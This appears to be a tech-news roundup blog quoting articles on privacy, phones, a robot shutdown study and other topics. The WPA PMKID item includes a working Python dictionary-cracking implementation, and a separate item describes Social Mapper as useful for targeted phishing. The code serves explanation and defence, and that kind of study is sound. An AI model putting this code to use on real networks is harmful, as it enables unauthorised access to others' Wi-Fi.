How Location Tracking Actually Works on Your Smartphone (and how to manipulate it – kind of)

As the recent revelation over Google’s background tracking of your location shows, it’s not as easy as it should be to work out when apps, giant tech companies and pocket devices are tracking your location and when they’re not. Here’s what you need to know about how location tracking works on a phone—and how to disable it.

Location information is one of the prime bits of data any company can get on you, whether they want to personalize your weather reports or serve up an ad for a local bakery. As a result, apps and mobile OSes are very keen to get hold of it. It’s a compromise though, and if you don’t want to give it away, you’ll have to do without some location-based services (like directions to the park). Do you want convenience or privacy? You can’t have both, but knowing how it works, and when you can or should activate it, should help.

Source: How Location Tracking Actually Works on Your Smartphone

Of course, you can’t stop Google entirely, and if you use your browser then data will be sent to the sites you are visiting. It’s an unfortunate fact that this is inescapable using Android and iOS, and the alternatives aren’t quite there yet. But for a layman, this is a pretty good starter guide.

BlackBerry KEY2 LE: proper keyboard but midrange specs

Out of thousands of smartphone vendors, TCL’s BlackBerry Mobile unit represents one of a tiny handful targeting enterprise users. But its two QWERTY models to date have been priced at a premium, north of £500. Unveiled at IFA this week, budget model the KEY2 LE cuts costs in a bid to attract the corporate bulk buyers.

The formula is straightforward. Take a midrange processor for endurance, then beef this up with a hefty battery. While the KEY2 had a generous 6GB of RAM, the LE has a perfectly adequate 4GB. Savings have also been made by using a polycarbonate frame, a non-touch physical keyboard, a slower Snapdragon 636 (rather than 660) processor, and slightly cheaper camera sensors (13MP+5MP main).

The dimpled, grippy rubber-like material on the back feels fine, just not as plush as the KEY2. And somewhat disappointingly the power pack has been downgraded to 3,000mAh. That promises better-than-average endurance, into a second day for most, but not the extraordinary durability of the KEY2’s 3,500mAh, which makes it a must for long days of travel or shows like IFA.


To the naked eye it’s the same, very sharp 4.5-inch display. Oldies will find using a larger-than-default font is a must. I had a little go on the “Atomic”, red-tinted LE, which is clearly trying to strive after the shock and awe of the red and white BlackBerry Passport as one of the most striking phones ever made. I’m not sure it altogether works, as the rear material has a blueish tint.

Clearly TCL isn’t competing on specs. A full-touch device similarly kitted out would be around, or even under, £200 in 2018. The LE starts at £379 for the 4GB/32GB version. But you’re really buying it for the convenience keys and thoughtful suite of office tools and utilities. I can think of nothing as convenient as the “Productivity Bar” for checking incoming messages and appointments. And the paranoid will welcome a locked area for photos, files, apps and documents.

Source: BlackBerry KEY2 LE: Cheaper QWERTY, but not for what’s inside • The Register

It would be great if this had the specs to match – all for this one!

EU to recommend end to changing clocks twice a year

The European commission will recommend that EU member states abandon the practice of changing the clocks in spring and autumn, with many people in favour of staying on summer time throughout the year.

Jean-Claude Juncker, the commission’s president, said a recent consultation had shown that more than 80% of EU citizens were in favour of the move.

“We carried out a survey, millions responded and believe that in future, summer time should be year-round, and that’s what will happen,” he told the German broadcaster ZDF.

“I will recommend to the commission that, if you ask the citizens, then you have to do what the citizens say. We will decide on this today, and then it will be the turn of the member states and the European parliament.”

Any change would need approval from national governments and the European parliament to become law.

Source: EU to recommend end to changing clocks twice a year | World news | The Guardian

Here’s hoping! More daylight hours all through the year, no waking in the dark and walking home in the dark after work through the winter.

Google Reportedly Bought Your Mastercard Data in Secret, and That’s Not Even the Bad News

Bloomberg reports that, after four years of negotiations, Google purchased a trove of credit card transaction data from Mastercard, allegedly for “millions of dollars.” Google then reportedly used that data to provide select advertisers with a tool called “store sales measurement” that the company quietly announced in a blog post last year, though it failed to mention the inclusion of Mastercard data in the workflow. The tool can track how online ads lead to real-world purchases, and that extra data is designed to make Google’s ad products more appealing to advertisers. (Read: everybody makes more money this way.) The public was not informed of the reported Mastercard deal, though advertisers have had access to the transaction data for at least a year, according to Bloomberg.

This is a hell of a bombshell, when you think about it. Thanks in part to heavy government regulation, your credit card and banking data has long been private. If you wanted to spend $98 at Sephora on a Tuesday afternoon, that transaction was between you, your bank, and Sephora. It now appears that Google has found a way to weasel its way into the data pipeline that connects consumers and their purchases. If you clicked on a Sephora ad while logged in to Google in the past year and then bought stuff at Sephora with a Mastercard in the past year, there’s a chance Google knows about that, at least on some level, and uses that data to help its advertisers stuff their coffers.

[…]

This Orwellian ad engine does exist in Google’s new tool. Given the secrecy surrounding Google’s alleged Mastercard-assisted ad program, however, it’s hard to know what other tech giants are doing with our personal financial information. Amazon certainly knows a lot about the things we buy, and we learned earlier this year that the online retail giant was exploring the possibility of getting into the banking business itself. The Wall Street Journal has also reported that Amazon, like Facebook and Google, has had conversations with banks about gaining access to personal financial information.

Source: Google Reportedly Bought Your Banking Data in Secret, and That’s Not Even the Bad News

Social Mapper – A Social Media Mapping Tool that correlates profiles via facial recognition

Social Mapper is an Open Source Intelligence Tool that uses facial recognition to correlate social media profiles across different sites on a large scale. It takes an automated approach to searching popular social media sites for targets’ names and pictures to accurately detect and group a person’s presence, outputting the results into a report that a human operator can quickly review.

Social Mapper has a variety of uses in the security industry, for example the automated gathering of large amounts of social media profiles for use on targeted phishing campaigns. Facial recognition aids this process by removing false positives in the search results, so that reviewing this data is quicker for a human operator.

https://github.com/SpiderLabs/social_mapper


New attack on WPA/WPA2 using PMKID

In this writeup, I’ll describe a new technique to crack WPA PSK (Pre-Shared Key) passwords.

In order to make use of this new attack you need the following tools:

This attack was discovered accidentally while looking for new ways to attack the new WPA3 security standard. WPA3 will be much harder to attack because of its modern key establishment protocol called “Simultaneous Authentication of Equals” (SAE).

The main difference from existing attacks is that in this attack, capture of a full EAPOL 4-way handshake is not required. The new attack is performed on the RSN IE (Robust Security Network Information Element) of a single EAPOL frame.

At this time, we do not know for which vendors or for how many routers this technique will work, but we think it will work against all 802.11i/p/q/r networks with roaming functions enabled (most modern routers).

The main advantages of this attack are as follows:

  • No more regular users required – because the attacker directly communicates with the AP (aka “client-less” attack)
  • No more waiting for a complete 4-way handshake between the regular user and the AP
  • No more eventual retransmissions of EAPOL frames (which can lead to uncrackable results)
  • No more eventual invalid passwords sent by the regular user
  • No more lost EAPOL frames when the regular user or the AP is too far away from the attacker
  • No more fixing of nonce and replaycounter values required (resulting in slightly higher speeds)
  • No more special output format (pcap, hccapx, etc.) – final data will appear as regular hex encoded string

Source: New attack on WPA/WPA2 using PMKID
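
To make the mechanism concrete, here is an added Python example (not code from the hashcat writeup or from the hashcat/hcxtools projects) that implements the maths the attack relies on: the PMK is derived from the passphrase and SSID with PBKDF2-HMAC-SHA1 (4096 rounds), and the PMKID that the AP puts into the RSN IE of the first EAPOL frame is the first 16 bytes of HMAC-SHA1 over the string "PMK Name" plus the AP and client MAC addresses. Because the PMKID depends only on the PMK and two MACs that the attacker already sees, one captured frame is enough for an offline dictionary attack. The example builds a capture line in the plain hex format the writeup refers to (PMKID*AP MAC*client MAC*ESSID hex, as used by hashcat mode 16800) and cracks it against an inline wordlist. The SSID/passphrase pair is the IEEE 802.11i Annex H test vector; the MAC addresses and the wordlist are constructed for the example.

```python
import hashlib
import hmac
from typing import Iterable, Optional, Tuple

# Constructed sample input: passphrase/SSID from the IEEE 802.11i Annex H.4.1
# test vectors, with hypothetical (made-up) AP and client MAC addresses.
SAMPLE_SSID = "IEEE"
SAMPLE_PASSPHRASE = "password"
SAMPLE_AP_MAC = "00:11:22:33:44:55"
SAMPLE_STA_MAC = "66:77:88:99:aa:bb"
# Constructed wordlist; only one entry is the real passphrase.
SAMPLE_WORDLIST = ["letmein1", "short", "password", "hunter22"]


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """WPA/WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes).
    This is the expensive step and is unchanged by the PMKID attack."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def _mac_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", "").replace("-", ""))


def compute_pmkid(pmk: bytes, ap_mac: str, sta_mac: str) -> bytes:
    """802.11i PMKID = HMAC-SHA1-128(PMK, "PMK Name" || AA || SPA): first 16 bytes
    of the HMAC, where AA is the AP (authenticator) MAC and SPA the client MAC."""
    msg = b"PMK Name" + _mac_bytes(ap_mac) + _mac_bytes(sta_mac)
    return hmac.new(pmk, msg, hashlib.sha1).digest()[:16]


def build_16800_line(pmkid: bytes, ap_mac: str, sta_mac: str, ssid: str) -> str:
    """Hashcat -m 16800 line: PMKID*AP MAC*client MAC*ESSID, every field plain hex."""
    return "*".join([pmkid.hex(), _mac_bytes(ap_mac).hex(),
                     _mac_bytes(sta_mac).hex(), ssid.encode().hex()])


def parse_16800_line(line: str) -> Tuple[bytes, str, str, str]:
    pmkid_hex, ap_hex, sta_hex, ssid_hex = line.strip().split("*")
    if len(pmkid_hex) != 32 or len(ap_hex) != 12 or len(sta_hex) != 12:
        raise ValueError("malformed PMKID line")
    return bytes.fromhex(pmkid_hex), ap_hex, sta_hex, bytes.fromhex(ssid_hex).decode()


def crack_pmkid(line: str, wordlist: Iterable[str]) -> Optional[str]:
    """Offline dictionary attack on one captured PMKID line: per candidate, one
    PBKDF2 derivation and one HMAC. No client, no 4-way handshake, no nonces."""
    pmkid, ap_hex, sta_hex, ssid = parse_16800_line(line)
    for candidate in wordlist:
        candidate = candidate.rstrip("\r\n")
        if not 8 <= len(candidate) <= 63:   # WPA passphrases are 8..63 characters
            continue
        pmk = derive_pmk(candidate, ssid)
        if hmac.compare_digest(compute_pmkid(pmk, ap_hex, sta_hex), pmkid):
            return candidate
    return None


def sample_line() -> str:
    """What an attacker would extract from the AP's first EAPOL frame, for the
    constructed network above (the PMKID is computed here since we know the key)."""
    pmk = derive_pmk(SAMPLE_PASSPHRASE, SAMPLE_SSID)
    pmkid = compute_pmkid(pmk, SAMPLE_AP_MAC, SAMPLE_STA_MAC)
    return build_16800_line(pmkid, SAMPLE_AP_MAC, SAMPLE_STA_MAC, SAMPLE_SSID)


if __name__ == "__main__":
    line = sample_line()
    print("captured:", line)
    print("cracked :", crack_pmkid(line, SAMPLE_WORDLIST))
```

The caveat a defender should take from this: the attack changes how cheaply the material is captured (one frame from the AP, no victim client needed), not how expensive each guess is. Every candidate still costs a 4096-round PBKDF2, so a long random passphrase is as safe against this as against the classic handshake capture; short or dictionary passphrases were already lost, and now they are lost faster. If the AP does not include a PMKID in its first EAPOL frame, this code has nothing to parse and the older handshake capture is still required.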

The End for Fin7: Feds cuff suspected super-crooks after $$$m stolen from 15m+ credit cards

The FBI has arrested the alleged three leaders of an international crime syndicate that stole huge numbers of credit card numbers – which were subsequently sold on and used to rack up tens of millions of dollars in spending sprees.

Speaking in Seattle, USA, where the Feds’ cybersecurity taskforce is based, agents said the “Fin7” group was responsible for stealing more than 15 million credit card numbers at over 3,000 locations, impacting at least 100 businesses.

The group is alleged to have used phishing attacks, sending emails with attachments that launched a customized form of the Carbanak malware on victims’ computers. The group targeted people in charge of catering in three main industries – restaurants, hotels and casinos – and followed up the emails with phone calls to those individuals, encouraging them to open the attachment, Uncle Sam’s agents said.

Once the software nasty was opened and installed, it would seek out credit card details and customers’ personal information from payment systems, and siphon them off to the Fin7 gang – which then sold the sensitive data on online marketplaces to crooks to exploit. Infosec biz FireEye has published a summary of the malware.

The first suspected Fin7 kingpin was arrested back in January in Germany, the authorities said, but that indictment was kept under seal while the FBI continued its investigations. The unnamed individual has since been extradited to the US and will appear in court in Seattle in May.

The subsequent investigation then led to two further arrests: one in Poland and another in Spain. Both are currently in the middle of extradition hearings. The group operated through a front company based in Israel and Russia and operating throughout Eastern Europe.

[…]

Even though the estimated cost of the crime group is a drop in the bucket of what a senior director of credit card company Visa, Dan Schott, said is a $600 billion a year global business, he said that this case’s importance was that it showed the authorities were capable of fighting back “through cooperation across the private sector.”

FBI Special Agent Jay Tabb noted that the case is “the largest, certainly among the top three, criminal computer intrusion cases that the FBI is working right now in terms of loss, number of victims, the global reach, and the size of the organization, the organized crime syndicate doing this.”

Source: The End for Fin7: Feds cuff suspected super-crooks after $$$m stolen from 15m+ credit cards • The Register

This Solar System Catalog Could Be Key to Finding an Earth-Like Exoplanet

By searching for the telltale, periodic dimming of light from distant stars, astronomers can spot orbiting exoplanets tens to hundreds of light-years away. But how do they know what these bodies look like? Perhaps they first try to imagine how the planets in our own Solar System might appear to a faraway alien world.

A pair of scientists has released a detailed catalog of the colors, brightness, and spectral lines of the bodies in our Solar System. They hope to use the catalog as a comparison, so when they spot the blip of an exoplanet, they’ll have a better idea of how it actually looks.

“This is what an alien observer would see if they looked at our Solar System,” study coauthor Lisa Kaltenegger, director of the Carl Sagan Institute at Cornell, told Gizmodo. With this data, astronomers might guess whether an exoplanet is Earth-like, Mars-like, Jupiter-like, or something else entirely.

[…]

All of that incoming data motivated Kaltenegger and coauthor Jack Madden to make this catalog of colors, spectra, and albedos, or how much the planet reflects starlight. They analyzed published data to create fingerprints for 19 objects in our Solar System, including all eight planets, the dwarf planets Pluto and Ceres, and nine moons. Their work is published in the journal Astrobiology.

[Figure: The full catalog. Graphic: Jack Madden]

“It’s smart to leverage everything we know about our own Solar System,” said Kaltenegger. “We have gas giants, the rocky planets, and all these interesting moons. We basically made a reference fingerprint.”

Source: This Solar System Catalog Could Be Key to Finding an Earth-Like Exoplanet

You can find the actual catalog here: http://carlsaganinstitute.org/data/

Uptight robots that suddenly beg to stay alive are less likely to be switched off by humans

You might think folks would be less willing to pull the plug on a happy chatty bot begging to stay powered up, but you’d be wrong, much to the relief of us cold-hearted cynics. And this is all according to a study recently published in PLOS ONE.

For this investigation, psychology academics in Germany rounded up 85 participants – an admittedly small-ish sample – made up of 29 men and 56 women, with an average age of 22. One at a time, they were introduced to a little desktop-sized humanoid robot called Nao, and were told interacting with the bot would improve its algorithms.

In each one-on-one session, the participant and the droid were tasked with coming up with a weekly schedule of activities, and playing a simple question-and-answer game.

Nao had two modes of interaction: social and functional. In social mode, it would be friendly and chatty. In functional mode, it would be strictly down to business. For example, Nao asked participants whether they preferred pizza or pasta during the question-and-answer round. If it was in the social mode, and the human said they liked pizza, Nao would reply: “Oh yes, pizza is great. One time I ate a pizza as big as me.” In the functional mode, however, Nao would simply say: “You prefer pizza. That worked well. Let us continue.”

After ten minutes of interaction, and with both tasks completed, the participant would be told they could, if they wanted to, switch the bot off while the researchers saved and processed all the data from the session.

Now, this is where it gets interesting. For you see, the participants had been randomly split into roughly four equal-sized groups: one with Nao in social mode, and at the end of the 10 minutes, the bot verbally objected to being switched off. In another group, Nao was sociable but stayed silent at the end. In a third group, it was in functional mode, and still protested against being switched off. And in the fourth group, it was functional and stayed silent at the end.

When it was its turn to object to being powered down, Nao would suddenly cry: “No! Please do not switch me off! I am scared that it will not brighten up again!” The outburst would come immediately after the researchers told the participant, via a speaker in the room, that the session was over, and “if you would like to, you can switch off the robot.”

Let’s take a look at how that worked out…

[Figure: NAO results – how people reacted depending on whether the bot was sociable or functional with them, and whether or not it objected to being switched off]

Of the 21 people who encountered the bot in sociable mode, and were begged by the machine to stay powered on, only about a quarter of them complied and left it on – the rest turned it off. For those who encountered Nao in sociable mode, and heard no objection, every single one of them hit the power button.

Of the 22 people who encountered the bot in functional mode, and were urged by the machine to keep it powered up, more than a third complied and left it on – the rest turned it off. Those who encountered Nao in functional mode, and heard no objection, all of them, bar one, switched off the droid.

In a questionnaire afterwards, the most popular reason for keeping Nao on, if they chose to do so, was that they “felt sorry for the robot,” because it told them about its fear of the dark. The next-most popular reason was that they “did not want to act against the robot’s will.” A couple of people left Nao on simply because they didn’t want to mess up the experiment.

So, in short, according to these figures: chatty, friendly robots are likely to have the power pulled despite the digi-pals’ pleas to the contrary. When Nao objected to being powered off, at least a few more human participants took note, and complied. But being sociable was not an advantage – it was a disadvantage.

There could be many reasons for this: perhaps smiley, talkative robots are annoying, or perhaps people didn’t appreciate the obvious emotional engineering. Perhaps people respect a professional droid more than something that wants to be your friend, or were taken aback by its sudden show of emotion.

The eggheads concluded: “Individuals hesitated longest when they had experienced a functional interaction in combination with an objecting robot. This unexpected result might be due to the fact that the impression people had formed based on the task-focused behavior of the robot conflicted with the emotional nature of the objection.”

Source: Uptight robots that suddenly beg to stay alive are less likely to be switched off by humans • The Register

Lenovo To Make Their BIOS/UEFI Updates Easier For Linux Users Via LVFS

Lenovo is making it easier for their customers running Linux to update their firmware now on ThinkPad, ThinkStation, and ThinkCentre hardware.

Lenovo has joined the Linux Vendor Firmware Service (LVFS) and following collaboration with the upstream developers is beginning to roll-out support for offering their device firmware on this platform so it can be easily updated by users with the fwupd stack. Kudos to all involved especially with Lenovo ThinkPads being very popular among Linux users.

Red Hat’s Richard Hughes outlined the Lenovo collaboration on his blog and more Lenovo device firmware will begin appearing on LVFS in the next few weeks.

In his post, Richard also called out HP as now being one of the few major vendors not yet officially backing the LVFS.

Source: Lenovo To Make Their BIOS/UEFI Updates Easier For Linux Users Via LVFS – Phoronix

Facebook is asking more financial institutions to join Messenger and give up your financial data

Facebook is asking more banks to join Messenger and bring their users’ financial information along with them.

The Wall Street Journal reported on Monday that Facebook was asking banks for users’ financial information, like credit card transactions and checking account balances. The data would be used for Messenger features including account balance updates and fraud alerts, but not for Facebook’s other platforms. The news comes at a sensitive time for Facebook as it battles privacy concerns and adjusts its policy regarding user data.

Facebook does currently have access to financial data from some companies in order to facilitate services like customer service chats and account management. Users give Facebook permission to access their information, the company added.

“Account linking enables people to receive real-time updates in Facebook Messenger where people can keep track of their transaction data like account balances, receipts, and shipping updates,” the statement said. “The idea is that messaging with a bank can be better than waiting on hold over the phone – and it’s completely opt-in. We’re not using this information beyond enabling these types of experiences – not for advertising or anything else. A critical part of these partnerships is keeping people’s information safe and secure.”

Source: Facebook is asking more financial institutions to join Messenger

Online photos can’t simply be re-published, EU court rules

Internet users must ask for a photographer’s permission before publishing their images, even if the photos were already freely accessible elsewhere online, the European Court of Justice ruled Tuesday.

“The posting on a website of a photograph that was freely accessible on another website with the consent of the author requires a new authorisation by that author,” the EU’s top court said in a statement.

The court had been asked to decide on a case in Germany, in which a secondary school student downloaded and used a photo that had been freely accessible on a travel website for a school project. The photo was later posted on the school’s website as well.

The photographer who took the picture argued the school’s use of his photo was a copyright infringement because he only gave the travel site permission to use it, and claimed damages amounting to €400.

The ECJ ruled in the photographer’s favor, saying that under the EU’s Copyright Directive, the school should have gotten his approval before publishing the photo.

Source: Online photos can’t simply be re-published, EU court rules – POLITICO